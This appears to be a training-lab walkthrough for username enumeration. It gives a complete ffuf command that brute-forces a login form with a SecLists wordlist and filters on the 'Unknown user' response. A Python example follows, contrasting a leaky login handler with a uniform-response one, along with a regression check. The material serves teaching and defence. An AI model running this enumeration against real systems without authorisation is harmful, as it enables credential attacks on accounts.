Brute-Force Attacks
Enumerate a valid user on the web application. Provide the username as the answer.
To complete this assessment we need the SecLists usernames wordlist and a simple ffuf command to brute-force an application username.
Step 1 - Download the SecLists wordlist:
Step 2 - Enumerate with ffuf:
ffuf -w xato-net-10-million-usernames.txt -u http://SERVER_IP:SERVER_PORT/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=random" -fr "Unknown user"

After a few seconds we got the username!
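The `-fr "Unknown user"` filter above works because the application answers differently for accounts that exist and accounts that do not. The sketch below is an added example, not code from the target application: it puts that leaky behaviour beside a login check that returns one message and does the same hashing work on both paths. The user store, the "Invalid password" and "Welcome" strings, and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000  # kept low so the example runs quickly; tune upward in production


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed sample user store: username -> (salt, password hash)
_salt = os.urandom(16)
USERS = {"alice": (_salt, hash_password("correct horse", _salt))}

# Dummy credentials checked for unknown usernames so both paths cost the same time
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = hash_password("dummy", DUMMY_SALT)


def login_leaky(username: str, password: str) -> str:
    """Distinct message per failure cause: the condition the response filter relies on."""
    if username not in USERS:
        return "Unknown user"  # no hashing done either, so timing leaks too
    salt, stored = USERS[username]
    if not hmac.compare_digest(hash_password(password, salt), stored):
        return "Invalid password"  # assumed wording, not taken from the page
    return "Welcome"


def login_uniform(username: str, password: str) -> str:
    """One failure message and one hash computation regardless of account existence."""
    salt, stored = USERS.get(username, (DUMMY_SALT, DUMMY_HASH))
    matches = hmac.compare_digest(hash_password(password, salt), stored)
    if matches and username in USERS:
        return "Welcome"
    return "Invalid username or password"


def leaks_usernames(login, known_user: str, unknown_user: str) -> bool:
    """True if a wrong-password response reveals whether the account exists."""
    return login(known_user, "wrong-password") != login(unknown_user, "wrong-password")
```

Running `leaks_usernames` against a staging login handler in a regression test catches a reintroduced distinct error message; rate limiting and lockout on the login endpoint remain necessary alongside it.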